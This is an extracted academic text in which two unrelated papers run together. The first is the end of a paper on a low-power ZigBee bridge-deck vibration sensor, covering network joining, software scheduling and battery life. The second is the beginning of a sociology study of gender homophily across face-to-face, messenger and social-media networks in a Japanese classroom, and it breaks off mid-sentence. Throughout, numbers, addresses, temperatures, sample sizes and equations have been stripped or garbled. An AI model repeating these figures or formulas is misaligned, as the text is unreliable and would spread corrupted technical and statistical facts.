channel to avoid possible interference. channels are sequenced incrementally to discard those channels whose energy values exceed the allowable energy level. channels with allowable energy level are selected and labeled as available channels. then active scanning is carried out to search the network information within the communication radius of the node. these messages are broadcast in the form of beacon frames in the network. nodes obtain these beacon frames through active channel scanning. then, according to these information, they find the best and relatively quiet channel. through recording results, they select a channel, which should have the least zigbee network, preferably without zigbee devices. during active scanning, the mac layer discards all frames received by the phy layer data service except beacons. international journal of advanced network, monitoring and controls volume , no. , c. set up the network id when the appropriate channel is found, the coordinator will select a network identifier (pan id, value (= x fff) for the network. this id must be unique in the channel used, cannot conflict with other zigbee networks, and cannot be used as the broadcast address xffff (this address is reserved address, can not be used). pan ids can be obtained by listening to the ids of other networks and selecting a non-conflicting id, or by artificially specifying the scanning channels to determine the pan ids that do not conflict with other networks. there are two address modes in zigbee network: extended address ( bits) and short address ( bits), where extended address is allocated by ieee organization for unique device identification; short address is used for device identification in local network. in a network, the short address of each device must be unique. when a node joins the network, it is allocated by its parent node and communicated by using short address. for coordinators, the short address is usually set to x . after the above steps are completed, the zigbee mesh network is successfully initialized, and then waiting for other nodes to join. when the node enters the network, the parent node (including the coordinator) with the strongest signal in the range of choice will join the network. after success, it will get a short address of the network and send and receive data through this address. the network topology and address will be stored in their flash. d. nodes join the network through coordinator when the node coordinator is determined, the node first needs to establish a connection with the coordinator to join the network. in order to establish a connection, ffd nodes need to make a request to the coordinator. after receiving the connection request, the coordinator decides whether to allow the connection, and then responds to the node requesting the connection. only when the node and the coordinator establish a connection, can the data be sent and received. the specific process of node joining the network can be divided into the following steps: nodes join the network is shown in figure . figure . nodes join the network e. find the network coordinator firstly, the coordinator of the surrounding network will be scanned actively. if the beacon is detected within the scanning period, the relevant information of the coordinator will be obtained, and then a connection request will be sent to the coordinator. after selecting the appropriate network, the upper layer will request the mac layer to set the pib attributes of phy and mac layer, such as phycurrent channel and macpanid. if not detected, after a period of time, the node re-initiates the scan. international journal of advanced network, monitoring and controls volume , no. , f. send the associate request command the node sends the association request command to the coordinator. the coordinator replies to an acknowledgment frame (ack) immediately after receiving it, and sends the connection instruction primitive to its upper layer to indicate that the connection request of the node has been received. this does not mean that a connection has been established, but only that the coordinator has received a connection request from the node. when the upper mac layer of the coordinator receives the connection instruction primitive, it will decide whether to grant the join request of the node according to its own resource (storage space and energy), and then send a response to the mac layer of the node. g. wait for the coordinator to process when the node receives ack from the coordinator to join the association request command, the node mac will wait for a period of time to receive the coordinator's connection response. if a connection response is received within a predetermined time, it notifies its upper layer of the response. when the coordinator sends a response to the mac layer of the node, it sets a waiting response time (t_response waittime) to wait for the coordinator to process the request command. if the coordinator has enough resources, the coordinator assigns a -bit short address to the node and generates a connection response command containing the new address and the successful status of the connection, then the node will succeed in building the coordinator. vertical connection and start communication. if the coordinator resources are insufficient, the nodes to be joined will resend the request information and enter the network successfully. h. send data request commands if the coordinator agrees to join the node in response time, the associate response command is generated and stored. when the response time is over, the node sends the data request command to the coordinator. the coordinator replies to the ack immediately after receiving the command, and then sends the stored related response command to the node. if the coordinator hasn't decided whether to agree to join the node after the response time arrives, then the node will try to extract the related response command from the beacon frame of the coordinator. if successful, the network can be accessed successfully. otherwise, the request information will be re-sent until the network is successfully accessed. i. reply when the node receives the correlation response command, it immediately replies an ack to the coordinator to confirm that it receives the connection response command. at this time, the node will save the short address and extended address of the coordinator, and the mlme of the node sends the connection confirmation primitive to the upper layer to notify the success of the association. j. nodes join the network through existing nodes when the ffd nodes close to the coordinator are successfully associated with the coordinator, the other nodes within the scope of the network join the network with these ffd nodes as their parent nodes. there are two ways to join the network, one is through association, that is, the joining nodes initiate joining the network; the other is direct, that is, the joining nodes. the volume is added to that node as a child of that node. the association mode is the main way for new nodes to join the zigbee network. for a node, only if it has not joined the network can it join the network. some of these nodes have joined the network but lost contact with their parents (such as orphan nodes), while others are new nodes. when an orphan node is an orphan node, the information of the original parent node is stored in its adjacent table, so it can send the request information of the original parent node to join the network directly. if the parent node has the ability to consent to its joining, it will enter the network successfully by directly telling its previously international journal of advanced network, monitoring and controls volume , no. , assigned network address; if the number of child nodes in its original parent node's network has reached the maximum, that is to say, the parent node can not approve its joining, it can only find and join the network as a new node. for a new node, it first scans the network it can find on one or more pre-set channels actively or passively, searches for the parent node that has the ability to authorize itself to join the network, and stores the data of the parent node that can be found in its adjacent table. data stored in parent nodes of adjacent tables includes zigbee protocol version, protocol stack specification, pan id and information that can be added. choose one of the smallest parent nodes in the adjacent table and send a request message to it. if there are more than two parent nodes with the same minimum depth, then randomly select one to send the request. if there is no suitable parent information in the adjacent tables, it means that the access process fails and terminates. if the request is approved, then the parent node will also allocate a -bit network address, at which time the network entry is successful, and the child node can start communication. if the request fails, look up the adjacent table again and continue sending the request information until joining the network. vi. software design a. introduction to working schedule the software work schedule is shown in figure . data is transmitted by relay mode to achieve low power consumption. therefore, in order to transmit data, it is necessary to wake up all nodes at the same time. the communication wake-up period is t. the selection of t value is based on the size of ram capacity, the frequency of vehicle passing and the real-time requirement of data transmission. in each cycle, once a vehicle passes by, the sensor collects data, and the cpu stores the data in ram. after data acquisition, it enters a deep dormant state, waiting for the next vehicle to pass or the next communication wake-up cycle. figure . software work schedule b. flow chart brief introduction the system software mainly consists of three parts: main function, data acquisition function and communication function. the main function mainly completes the setting of startup parameters and entering the dormant state. data acquisition function uses external interrupt wake-up. communication function uses timer interrupt wake-up. the main function is relatively simple, and it is no longer necessary to elaborate. the following is a brief introduction of the two interrupt functions. the flow chart of the data acquisition function is shown in figure . when the vehicle passes by, the vibration switch is triggered and the cpu enters the external interrupt function. after external interruption wakes up the cpu, the power supply of each device is turned on through adg , and the data of acceleration sensor is collected, which is temporarily international journal of advanced network, monitoring and controls volume , no. , stored in the data memory. the terminal collects data and keeps it until no vehicle passes by. after all the vehicles passed, the cpu turned off the power through adg , and the terminal went to sleep. the communication function is shown in figure . when the communication time arrives, the timer wakes up the cpu, detects the wireless signal, and waits for the central node to be ready. after zigbee is successfully networked, each terminal uploads data in turn. if the network is idle after the transmission is completed, it will enter a dormant state. if there is no vehicle passing in the communication process, the sensor power supply need not be turned on. figure . data acquisition function figure . communication function vii. conclusion after the prototype is completed, it is placed outdoors for power consumption test. the outdoor ambient temperature ranges from - c to c, and the relative humidity ranges from % to %. in order to better simulate the vehicle and environment on site, data acquisition is carried out under the viaduct deck during the construction period. the weight and speed of construction vehicles are closer to the field vehicles than those of ordinary household cars. the average power consumption under different working conditions is: no more than . mw in dormant state, mw in vehicle passing and mw in communication. the average power consumption of the whole day is mwh based on minutes of vehicle passing time and minutes of communication. the selected batteries are ah, . v and the total power is . wh. considering the factors such as battery self-discharge, conservative estimates can work for days to meet the initial design requirements, that is, the equipment can work for at least two consecutive years. the data packet loss rate of wireless communication is less than %, and the failure rate of long-time equipment has not been tested yet. international journal of advanced network, monitoring and controls volume , no. , this paper designs a micro-power bridge deck vibration detection terminal, which uses wireless zigbee communication, can flexibly network, long-distance low-power transmission, and control the power consumption of hardware, so as to achieve micro-power work. experiments show that disposable lithium batteries can work for more than two years. the detection terminal has strong concealment and simple construction, so it has good prospects in frontier monitoring and battlefield perception. acknowledgment fund name: national and local joint engineering laboratory of new network and test control fund number: gsysj reference [ ] design of a vibration data acquisition device yin ming wang pingping equipment manufacturing technology issue [ ] design of an ultra-low power wireless vibration sensorxiuwei state tang shengwu sensors and microsystemsvolume , volume , [ ] vibration detection of ship driving system based on sensor network feng gang and cai donglingship science and technologyvolume , no. a, december [ ] design of network monitoring system for oilfield water injection wellblock. you bo,zhang haitao,jia deli.journal of xi'an shiyou university(natural science edition), , : vol no . [ ] research on implementation technology of zigbee wireless communication protocol[j] . ren xiuli , yu haibin. computer engineering and applications, [ ] design of oilfield wireless monitoring system based on wifi and zig-bee[j]. cao qinghua, liu chang,meng kaiyuan. journal of xi’an petroleum university (naturalscience edition), , ( ): - . [ ] based on zigbee oil well remote monitoring system designand implementation[j]. zhang xiaohua, zhang wenfang, shirudong,et al. control engineering, , © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections issue | vol. article | doi: . /connections- . comparing gender homophily among the multilayer media social networks of face-to-face, instant messenger and social networking services: a case study of a high school classroom naoki maejima the university of tokyo, graduate school of humanities and sociology, tokyo, japan. e-mail: malimo @gmail.com received for publication january , . abstract in which social worlds does gender homophily operate more strongly – offline or online? to address this question, the following two aspects must be considered. first, people currently use many types of online communication media. second, to examine the homophily effects exclusively, it is necessary to control for other network formation mechanisms such as ‘foci’ and ‘triadic closure.’ for this study, i conducted a mixed-method research in a high school in rural japan. i asked students about who they interacted with face-to-face (f f), through instant messenger (im), and social networking services (sns) and then analyzed the social networks using exponential random graph models (ergms). subsequently, i conducted semi-structured interviews to uncover the practices and social contexts of each communication media and explain the results of the quantitative analysis. the results showed that sns was more gender heterogeneous than offline. in the im network, a small gender homophily effect was initially observed. however, three months later, its strength decreased to almost the same as that in the sns networks. from the qualitative research, some key mechanisms producing the difference in gender homophily are specified, such as precedence of f f communication to im interaction, independence of sns communication from f f, recommending functions, and hobby homophily. overall, this study implies that considering offline or online alone may cause misunderstanding regarding homophily in organizations because the observed strength of homophily effects depends on whether the space is examined offline or online, what kind of media is examined, and when the online social network data are collected. keywords homophily, social media, multilayer networks, exponential random graph models. homophily is defined as ‘the principle that contact between similar people occurs at a higher rate than among dissimilar people’ (mcpherson et al., , p. ). this principle is universally observed in a wide variety of social networks. currently, social interactions occur in both offline and online spaces. this raises an important question: are there differences in homophily between offline and online spaces within a single social group? although many preceding studies have examined homophily in both offline and online spaces, few studies have examined the differences in homophily between these spaces in small social groups such as classroom and workplace. after the emergence gender homophily in multilayer media social networks of social networking services (snss) such as twitter and facebook, social connections offline and online have become more dependent, continuous, and multiplexed (boyd and ellison, ; ellison et al., ). it becomes increasingly difficult to understand our social networks researching offline or online alone. if there is a difference in the strength of homophily between offline and online social networks, studies regarding homophily that examine only the offline or online environment will fail to depict the strength of homophily in a social group. in this study, i aim to reveal the differences in gender homophily among communication media through a case study of a high school classroom. to address the ‘offline vs. online’ question in a modern setting, it is necessary to consider that nowadays people use multiple online media tools such as instant messenger (im) and snss. the present study distinguishes between online communication in im and snss and compares the homophily mecha- nisms in each network with the face-to-face (f f) network. although they are created before the emergence and development of snss, some computer-mediated communication (cmc) theories predict that online communication filters ‘social cues’ and alleviates the social norms that constrain social interactions. moreover, it can be assumed that online spaces generate a unique social identity between individuals who share the same offline membership, such as a classroom or workplace. in online spaces, people are less constrained by social norms than offline spaces when they interact with each other, and they foster a feeling of similarity if they belong to the same social group, which would promote social interaction among them regardless of social attributes such as gender. therefore, i argue that online social networks are more heterophilic than offline social networks. furthermore, i also expect that there is a difference in the strength of gender homophily between online media, and i hypothesize that the sns network layer is more heterophilic than the im network layer. snss such as facebook are often used for maintaining offline friendship (ellison et al., ) and offer messaging functions like im. however, snss form ‘networked publics’ (boyd, ), which contain many other unknown users on the same platform and offer them access to the users’ contents through networked technology such as searching, sharing, or retweeting. in such a situation, compared to im, individuals find and meet their friends with a common offline membership, which can foster a stronger group identity among them. in this study, homophily is regarded as individuals’ preference to form social ties with others who have similar social attributes. it is necessary to distinguish homophily as a process of tie formation in the network and a joint outcome of various mechanisms including ‘foci’ or ‘triadic closure’ which can also induce network homogeneity (wimmer and lewis, ). the foci mechanism suggests that common activities such as club activities are essential for tie formation across communication media. the triadic closure mechanism proposes that friends of friends are likely to be friends. to distinguish the strength of homophily from these other network formation mechanisms, the present study applies exponential random graph models (ergms) to media multilayer social networks. finally, in addition to quantitatively testing hypo- theses, through qualitative research, this study also tries to identify some social practices and mechanisms that produce differences in homophily in each network layer. homophily in offline and online social networks homophily in offline social networks in offline spaces such as high school classrooms, social segregation by gender, age, race/ethnicity, and extra-curricular activities is often observed (kandel, ; shrum et al., ; moody, ; mouw and entwisle, ; goodreau et al., ; wimmer and lewis, ; leszczensky and pink, ). for example, shrum et al. ( ), from a large-scale study of , schoolchildren, grades to in the southern united states, revealed that for the third grade, about two-thirds of the expected counts of cross-race ties were not observed, and for the sixth grade, % of the expected counts of cross-gender ties were missing. social segregation in an organization is a result of complex network formation mechanisms. it has been noted that segregation is caused not only by the preference to form social ties with who have similar social attributes to them, foci (i.e., involving the same community or activity induces tie formation) and triadic closure (i.e., friends of friends tend to be friends) affect segregation (goodreau et al., ; wimmer and lewis, ). without considering these features, homophily effects could be overestimated. homophily in online social networks at the same time, there is a large number of studies on homophily on online media. here, ‘online media’ connections refers to a wide range of digital communication tools on the internet, such as e-mail, newsgroups, instant messengers, myspace, facebook, twitter, and so on. recently, it has been pointed out that snss tend to connect homogeneous actors and cause ‘echo chamber’ problems (colleoni et al., ). for example, conover et al. ( ) reveal that, by analyzing over , tweets during the u.s. congressional midterm elections on twitter, retweets networks containing political messages are highly segregated, where left- and right-leaning users are sparsely connected with each other. however, some studies suggest that online media alleviate social segregation. in the early stages of the internet, the online world was proposed to be a ‘virtual community’ (rheingold, ) – an independent, free, and progressive utopia (barlow, ). therefore, research on online social networks emphasizes the liberty and diversity of the online world (parks and floyd, ; kendall, ). parks and floyd ( ) researched users of ‘usenet,’ one of the oldest and most popular computer networks before the spread of the world wide web and hosted wide-ranging newsgroups. they found that about two-thirds of users made personal connections with people they first met on the newsgroup. parks and roberts ( ) claimed that, on a moo (a text-based virtual space), . % of social relations were cross- gender ties. in a more modern setting, another study analyzed friends’ communication in myspace, one of the earliest snss, and found no gender homophily effects (thelwall, ). in another example, laniado et al. ( ) analyzed the case of ‘tuenti,’ a spanish sns, mainly focusing on homophily differences between men and women, and found that gender homophily was stronger among women than men, and the rates of same-sex friends of both genders were lower than those of offline studies. multilayer media social networks however, these previous studies considered only one layer of social networks. this is problematic given the modern media environment. since the emergence of snss such as twitter and facebook, social connections offline and online have become more dependent, continuous, and multiplexed (boyd and ellison, ; ellison et al., ). in a web survey of undergraduate students (n = ), ellison et al. ( ) found that facebook was used to contact old friends and maintain social connections that originated at offline parties or with classmates. in this manner, the internet changed from a place for strangers to meet to a tool for already acquainted people to become friends. since individuals today not only interact with others face-to-face but also through various communication media, such as im or snss, social ties with others are created on diverse media simultaneously. therefore, the whole social network should be treated as a multilayer media network (haythornthwaite, , ; kivelä et al., ). it becomes increasingly difficult to understand our social networks researching offline or online alone. if this aspect of modern communication is not considered, research on social networks would draw the wrong image about homophily. a few studies have examined such multilayer media networks. for example, igarashi et al. ( , ) studied f f interactions and mobile phone text messaging (mptm), including both e-mail and short message service (sms), obtained from a survey of first-year undergraduate students. specifically, they investigated the whole network of each layer and quantified gender homophily as the network formation principle in each layer. baym and ledbetter ( ), from a survey of users of a music-sharing website called ‘last.fm’, found that connections on the platform were more likely to be cross-gender compared to connections face-to-face or through phone calls and other websites. in another example, hristova et al. ( ) compared the network structure between facebook and offline social networks to assess the heterophily of political opinions and homogeneity of school year in online networks. however, these studies examined only a small part of the multilayer media or did not consider structural effects such as foci or triadic closure. to address the ‘offline vs. online’ question in terms of homophily, we must consider two factors. first, people use various types of communication media. although hristova et al. ( ) regarded facebook as ‘online’ media, this category intrinsically includes diverse electronic communication media. moreover, it is a misleading categorization when the homophily effect of various communication media is also not evaluated concurrently. second, to evaluate the effect of homophily exclusively, it is necessary to control other network formation mechanisms such as foci (feld, ) and triadic closure (goodreau et al., ; wimmer and lewis, ). there is a huge difference between ‘homophily’ and ‘network autocorrelation’ (feld and grofman, ). ‘homophily’ is an expression of personal preferences, while ‘network autocorrelation’ is the trend of ‘linking among similar,’ which is caused by various mechanisms such as belonging to the same homogeneous community. gender homophily in multilayer media social networks gender homophily the current research specifically focuses on gender homophily. in a review study, mehta and strough ( ) claimed that gender homophily exists across the entire lifespan. in an offline situation, stehlé et al. ( ) examined gender homophily among primary school students based on network data measured in a primary school in france over two days, using wearable devices that recorded proximity among students. as a result, gender homophily was ob- served in every grade. gender segregation, which is caused by gen- der homophily, produces various outcomes for in- dividuals and networks. kalmijn ( ) claimed that gender segregation affects outcomes in at least three ways. first, gender segregation is important because it creates gender stereotypes and strengthens traditional gender roles. second, it prevents people from understanding each gender and makes romantic relationships more complex. third, interactions of both genders enhance the social capital of women. based on fieldwork in a high school classroom in japan, the present study examines differences in the degree of gender homophily among various social network layers of communication media, considering, as mentioned above, network mechanisms such as foci and triadic closure. theory and hypothesis from several theories in computer-mediated commu- nication (cmc) studies, it can be predicted that the effect of gender homophily on a social network operates more weakly in an online world. note that the theories were made in the pre-sns period, when only text-based messaging media such as e-mail were available, and people communicated with anonymous others through these media. although in the post-sns period, people often use online media to maintain the relationship between friends who have already known each other, the theories still provide deep insight into homophily in offline and online social spaces. according to ‘reduced social cues theory,’ electronic media reduces social cues to infer the social contexts of others, including geographic lo- cation, affiliation, status, job, age, and gender. these media attenuate social cues available in face-to- face interaction, including non-verbal cues such as gestures, tone of voices, and facial expression to recognize social contexts (sproull and kiesler, ). since the lack of these non-verbal cues causes social anonymity, the effects of norms and standards of social groups on behavior are attenuated, facilitating anti-normative behaviors (kiesler et al., ). note that in the modern media environment, where people use online media to maintain the relationship between friends they already know, people know the social attributes of each other, and they are not perfectly anonymous because they experience meeting offline. however, when they interact in the im and snss, only a few non-verbal cues are available, which may lead to anti-normative behavior. for instance, when considering students in a classroom, the lack of cues in the online spaces, such as upset facial expressions of girls when a boy speaks to them and the gaze from others may facilitate inter-gender communication. reduced social cues theorists often think the relationships through cmc as they are impersonal and not useful for cultivating relationships, compared to face-to-face communication. although empirical studies based on reduced social cues theory focused on ‘flaming’, i.e. aggressive and hostile verbal behavior (kiesler et al., ), subsequent studies revealed that cmc can promote positive relationships as well as face-to-face communication through mechanisms such as long-term message exchange complementing the scarcity of social cues and selectively disclosing themselves (walther, , ). however, the perspective that technological features of online media weaken social norms regulating communication between people is insightful and informative to study homophily in the offline and online spaces in that they offer possibilities for network formation otherwise regulated by the norm in the offline space. taken together, this theory predicts that online communication media lead social networks toward lower levels of gender homophily. as it has long been widely known, cross-gender friendship is constrained by social norms (booth and hess, ). since the media reduces social cues and weakens the social norms that constrain social interactions in offline spaces, gender homophily is weaker in the online world. furthermore, in social spaces where people use multiple media and their connections overlap across various media, it is expected that offline membership will be similar to online encounters. the formation of online ties not biased by social attributes can be accounted for by ‘group identity’ because communication media enables users to communicate and produces a distinct identity. according to meyrowitz ( ), whether one associates with the same group identity as others depends on the connections specific situation. meyrowitz offers the following example: “any common experience, information, or role that separates two or more people from others will give them a sense of common identity. yet because social experience, information, and roles are situation-bound, group identities will change with variations in situations or with a shift in participants’ perspectives concerning “insiders” and “outsiders.” two new yorkers who meet in georgia may feel an immediate bond that unites them “against” georgians. at the same time, however, a georgian and a new yorker who meet in italy may feel a similar connection with each other because they are both american.” (meyrowitz, , p. ) as in this example, when students meet in the classroom (i.e., offline space), they take their setting for granted. however, if they meet online, they may feel ‘an immediate bond’ because they have the same group identity as classmates, which would promote interaction among them. thus, if individuals in the same social group encounter one another in an online space, social cues are reduced, and perceptions of similarity grow. this generates social ties among individuals, regardless of their social attributes. in other words, offline spaces themselves become ‘foci’ (feld, ) that densely connect people in online spaces. this can be specific to the modern multiplex- media situation. in addition, the difference in gender homophily among online media can be supposed. in particular, snss such as myspace and facebook have an aspect of ‘networked publics,’ which have the following three dynamics: ‘invisible audiences,’ ‘collapsed contexts,’ and ‘the blurring of public and private’ (boyd, ). as previously mentioned, most snss such as facebook use them to connect and maintain friendships with people whom they have already met offline. however, users can deliver or receive content from distant individuals through the network, and user profiles can be searched by other users. these distant audiences are invisible, but users are clearly conscious of their existence. teenage users of snss even attempt to prevent others from searching for them (boyd, ). therefore, snss offer more opportunities to find and recognize many strangers who do not share offline membership and foster group identity online more strongly than im. moreover, the functionality of snss can make gender homophily on snss weaker than im. snss often implement recommendation functions, which helps users to find other users who are likely to match them. this function promotes them to find and identify users who have the same offline membership because profiles that users input by themselves give clues to who an account is. furthermore, information on profiles may bring unexpected findings of similarity such as hobby or tastes, which promotes tie formation based on cultural matching, canceling out the gender homophily. based on this, regarding the ‘online vs. offline’ problem, i formed a two-part hypothesis concerning multiple online communication media: hypothesis a: in the sns social network layer, gender homophily operates more weakly than in the offline social network layer, and hypothesis b: in the im social network layer, gender homophily operates more weakly than in the offline social network layer. likewise, regarding the difference in gender homophily among online media, i hypothesized that in the sns social network layers, gender homophily operates more weakly than in the im social network layers (hypothesis ). to examine the two hypotheses, i evaluate the degree of homophily in each layer, comparing gender homophily in face-to-face versus online networks. data and methods in this study, i adopted a mixed-method framework that integrates qualitative and quantitative research methods. i analyzed the network structure of the observed social network using quantitative sta- tistical approaches. in addition, i captured the practices, meanings, processes, and other social contexts through a qualitative approach to interpret the statistical analysis. the research design of this study was a sequential explanatory design, which begins with quantitative data collection and analysis, followed by qualitative research to elaborate on the results of the quantitative analysis (teddlie and tashakkori, ; domínguez and hollstein, ). the results of the qualitative research were used to explain the results of the quantitative research, such as the differences in gender homophily effects between network layers. a series of surveys were conducted in a high school classroom in the rural region of chūbu, japan. the city’s central station can be reached by a super express train (also known as shinkansen) from tokyo. this city is one of the snowiest areas in japan, and skiing and snowboarding are popular in winter. the high school is located at the foot of the mountains. most students travel a great distance by train to reach the central station and then take buses, bicycles, etc., to the high school. there were approximately students in this school. the school is more academically advanced than many other schools in the prefecture, and most of the students go on to gender homophily in multilayer media social networks university. in the third grade, the students were busy studying for entrance examinations. the survey was conducted in a classroom with second-grade students. in japan, the second grade in high school is equivalent to the th grade in a us high school and year in a uk secondary school. the students’ ages were primarily or , with some exceptions (e.g., there were older students who had initially failed their high school entrance examinations.) quantitative research before conducting the research, i interviewed the class teacher in detail about the classroom. students rarely use e-mail but mainly use line to contact other students, and they have a group chat that almost all students in the classroom join. line is the most popular instant messaging application in japan. it can be seen as a representation of the various messaging apps because it has typical functions such as sending messages, creating group chat rooms, sharing pictures and videos, and using stickers and emoji, much like messaging apps popular in other countries, such as whatsapp, facebook messenger, and viber. as for sns usage, when classroom allocation was rearranged (when students advance from first to second grade in april, the classroom allocation is rearranged), some students advertised their usernames on twitter so that other students could follow their accounts. based on this information, i conducted a que- stionnaire survey on june (wave ) and september , (wave ). although this study’s scope is a cross-sectional status of homophily, i analyzed both waves. at this school, the class change took place in april for the second-grade students. by studying the results from the two waves, it was possible to determine whether there was a difference between the early stages of friendship formation within the class and three months later. conducting the research in two waves also verified the robustness of the results. the questionnaire consisted of three sections. the first section contained questions about the social attributes of students (e.g., ‘what is your gender?’), the second section contained questions about the media usage of students (e.g. ‘which messaging app do you install?’), and the third section contained questions about social networks among students (e.g. ‘who do you talk with?’). in the first section, i asked students about their gender, club activity, and academic courses. second, i asked if they had a mobile phone or not, which snss they use, and how many times they have used snss. finally, i asked with whom they talk in the classroom, with whom they communicate through instant messenger, and to whom they comment or reply and on which sns. in the social network module, i used a name generator based on the ‘recognition method’ (robins, ). although standard name generators ask for names of individuals who are related to the respondent, in this study, i asked for the roster number of each student in order to not record their names on the questionnaire and protect their personal information. although the network data to be collected in this study can be directed, the data were converted to undirected networks in the analysis. if at least one of the dyads recognizes the interaction, whether reciprocal or nonreciprocal, i converted it to an undirected tie with weight . the research interest of the present study is not in the informational flow or the recognition gap of social ties between males and females, but in the existence of social relationships itself. moreover, in the section of the questionnaire on social ties in f f and im, it asked ‘with whom’ rather than ‘to whom’, which limits the question to ‘interaction’ among students. if the recognition is not reciprocal, it only means that respondents could not recall the interaction. however, the question regarding social ties in sns, the question asks, ‘to whom they comment or reply’: i asked this question in this way because i believe that questions such as ‘who is the person you comment on and responds to your comments?’ is redundant and not easy for respondents to recall their social interactions. to evaluate the degree of homophily in each layer, it is necessary to consider other mechanisms of network formation. in particular, this study considers ‘foci’ and ‘triadic closure’ as important network- forming mechanisms. in the following sections, i elaborate on each mechanism in detail. foci to evaluate the degree of gender homophily more exclusively, it is necessary to consider foci mecha- nisms. ‘foci’ (or singular ‘focus’) is defined as ‘a social, psychological, legal, or physical entity around which joint activities are organized (e.g., workplaces, voluntary organizations, hangouts, families, etc.)’ (feld, , p. ). shared foci provide opportunities to form ties within units, independent of preference to some extent (hallinan and williams, ). i consider foci to be a control variable because, in addition to homophily, it is predicted that students will have more social ties based on belonging to the same club or academic course. if there are gender differences in participation connections in club activities or academic courses and such foci effects were not controlled for, the true homophily effect could not be estimated because of the network autocorrelation caused by the effects of foci. in japanese high schools, club activities and academic courses are intended as important foci to connect students. club activity in junior high or high school is called bukatsu in japanese: bukatsu refers to ‘school club activities and to the clubs themselves, which are devoted not only to sports but also to music, art, science, and others’ (omi, , p. ). students in the same club are predicted to spend most of their school lives together because they practice their activities before and after school, on weekends, and during summer or winter vacations. therefore, it is natural that club activities operate as strong foci to connect students in the same bukatsu in both the classroom and the online world. in the case of this high school, there are two main types of bukatsu: sports and culture. sports clubs include tennis, baseball, rugby, swimming, athletics, and kendo. both girls and boys can join the same club, with some exceptions such as volleyball and basketball club, which are separated by gender (e.g., a girls’ volleyball club and a boys’ volleyball club). culture clubs include brass bands, choruses, drama, computers, biology, and in-house magazine. unlike sports clubs, all culture clubs accept participants regardless of gender. furthermore, academic courses may also operate as foci. in many high schools, students can choose between literature or science courses when they are in the first or second grade. each academic course has a different curriculum, and students often take classes with students from other classrooms in the same academic course. this study hypothesizes that academic courses also operate as foci because students who share the same academic course spend more time together than those who do not. triadic closure network formation is not caused merely by the matching of nodal attributes, but also by network endogenous effects. sometimes, the network structure itself induces network tie formation. triadic closure is an important network endogenous mechanism and refers to the trend that friends of friends are more likely to become friends, regardless of shared attributes or foci. in the context of classroom segregation in america, goodreau et al. ( ) suggest that homophily and friends of friends must be distinguished from one another. to evaluate the degree of gender homophily, the effect of triadic closure should be controlled for; otherwise, the triadic closure mechanism could amplify the homophily effect (wimmer and lewis, ). exponential random graph models this study aims to reveal the gender homophily effect of each network layer. as i mentioned before, to estimate the effects of gender homophily, it is necessary to control for other network mechanisms such as foci or triadic closure (goodreau et al., ). therefore, i used exponential random graph models (ergms) (robins et al., ) to do so. normally, the ergm is formulated as follows: pr expy y z y a =( ) = ( )∑ k qk k the probability of obtaining the observed network can be regressed on various network statistics in an exponential form. y is a random variable of a binary network, whose network size is the same as the observed network; y is the observed network itself; and θ k is the corresponding parameter of network configuration k. these parameters indicate the extent to which specific network configurations, such as matching of gender or triadic closure, contribute to the whole network formation. z k (y) is a statistic for the network configuration k. for example, if y contains four triangles, z triangle (y) = . κ is the normalizing coefficient, or in other words, the sum of exp∑ a θ k z k (y) for all possible networks. a is the set of network configurations. since κ cannot be calculated realistically even in a small network, parameters are estimated by monte carlo maximum likelihood maximization (mc-mle) based on random graphs generated by mcmc. to evaluate homophily or foci effects, i used a ‘nodematch’ term, which is formulated below. the variable y ij equals if there is an edge between node i and node j; otherwise, y ij equals ; a i and a j is the attribute of node i,j. this equals the count of edges whose nodal attributes are the same: z ynodematch i j a a ij i j = = ∑ , | to examine the effects of triadic closure, i input network statistics of geometrically weighted edge-wise shared partners (gwesp) as one of the independent variables. the network statistics of the gwesp are formulated as follows: z e e esp ygwesp y p n p p( ) ( )= − −( )( ) = − −∑a a gender homophily in multilayer media social networks where p is the number of shared partners of an edge. the variable n is the number of nodes in the network y. esp p (y) is a count of edges that have p edge-wise shared partners. if p = , esp (y) equals the number of edges that share only one partner. α is the ‘decay’’ parameter, which is input to avoid the degeneracy problem of the ergm (hunter, ). finally, the main research interest of this study is to compare the strength of homophily, that is, the parameter of gender nodematch among various network layers. to evaluate the significance of the differences between network layers, i used % confidence intervals ( % cis) of the estimated para- meters. if % cis of the same parameter between two network layers do not overlap, it can be said that there is a statistically significant difference. qualitative research four months after the first questionnaire research, on october - , i conducted semi-structured inter- views based on the results of the aforementioned analysis to capture more information about students’ communication media practices and the mechanisms of social network formation. i asked, for example, ‘do gender or academic courses affect your social connections?’, ‘is there an opportunity to use im or snss in club activities or classes?’, ‘what kind of posts do you mainly make on sns (twitter)?’, and ‘how do you make friends on im and snss?’ ethical considerations to handle the ethical problems of social network research, i complied with the guidelines given by borgatti and molina ( ). in the context of the present research, there are two ethical problems to be overcome: anonymity and consent. first, regarding anonymity, few social attributes are sufficient to identify individuals in small organizations (borgatti and molina, ). second, regarding consent, non- respondents can be named by other respondents regardless of their will (borgatti and molina, ). considering these problems, i performed the following three operations in the research. first, the node ids assigned to the dataset are not roster numbers but randomly generated numbers. this reduces the risk of personal identification when publishing research datasets. roster numbers are not perfectly anonymized because these numbers are arranged in the japanese alphabetical order of students’ last names, and there is a possibility of individual identification. to obtain anonymized node ids, roster numbers were converted into random numerical sequences that could be mapped onto roster numbers. after completing the research, i deleted the mapping table between the roster numbers and node ids. second, in small social groups such as high school classes, individuals can be identified through combinations of social attributes, thus compromising anonymity. to address this, this article provides information on club activity as the number of members or their category (sports or culture) in this article. third, i created a consent form asking if respondents agreed to participate in the research. all students signed this form, but absent students did not answer this form. in the present study, absent students were eliminated from the study. results figure shows network graphs of face-to-face (f f), im (line), and sns (twitter) interactions in both waves. to make it easier to visually compare each layer, nodes in each network are arranged with the same coordinates obtained by the fruchterman– reingold algorithm applied to the f f network of wave data. circle-shaped nodes indicate male students and triangle-shaped nodes indicate female students. table shows the descriptive statistics of the students. in both waves, the number of valid res- ponses was ( males). the number of club activities to which students in this classroom be- longed was , the -member clubs totaled , the -member clubs totaled , and the -member clubs figure : network graphs. connections totaled . here, ‘n-member club’ refers to clubs to which n student(s) in this classroom belong. since almost all students in this high school belonged to some clubs, it is possible that the overall number of members in each club, including students who were not in this class, was much higher than the values displayed here. as for the academic courses, the literature course included students, and the science course included students. for im, students used line, which is the most common instant messenger service in japan, but one student did not use any im services. regarding snss, students used snss and students did not. specifically, students had an account on twitter, students were on facebook, eight students were on instagram, eight students used google+, and three students used other snss (multiple answers were allowed). regarding sns networks, in the wave data, three dyads interacted on instagram, and in the wave data, 